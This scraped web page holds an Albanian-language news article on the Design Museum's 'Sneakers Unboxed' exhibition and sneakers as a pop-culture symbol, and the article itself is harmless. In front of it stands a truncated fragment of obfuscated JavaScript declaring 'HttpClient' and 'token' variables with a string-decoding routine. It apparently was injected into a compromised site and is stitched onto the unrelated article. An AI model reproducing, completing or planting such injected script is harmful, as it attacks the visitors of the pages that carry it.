;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çfarë tregojnë atletet tuaja për ju?

By

Gjatë disa dekadave, atletet kanë vulosur statusin e tyre si një monedhë e pop-kulturës.

Madje në vitin 1986, legjendat e hip-hopit të Nju Jorkut, “Run DMC” krijuan një himn me këngën e tyre të suksesshme “My Adidas”.

Në muzeu e Dizajnit në Londër së fundmi është mbajtur një ekspozitë e atleteve e titulluar “Sneakers Unboxed”, e cila i trajton atletet si fenomen në vete, shkruan BBC, transmeton Klankosova.tv.

Kreatorja Ligaya Salazar tha se me anë të kësaj ekspozite ka dashur të tregojë një anë tjetër të atleteve.

“Ajo që më pëlqeu ishte të tregoja historinë e atleteve në një kontekst dizajni pasi ato kanë rëndësi të madhe në jetën e shumë njerëzve”,shtoi ajo.

Kjo ekspozitë po konsiderohet si e tillë që zbërthen anatominë e një atleteje.

Ndryshe, përmes kësaj ekspozite po tentohet të tregohet edhe pjesa emocionale që njerëzit e krijojnë me atletet e tyre.

Artikuj të ngjashëm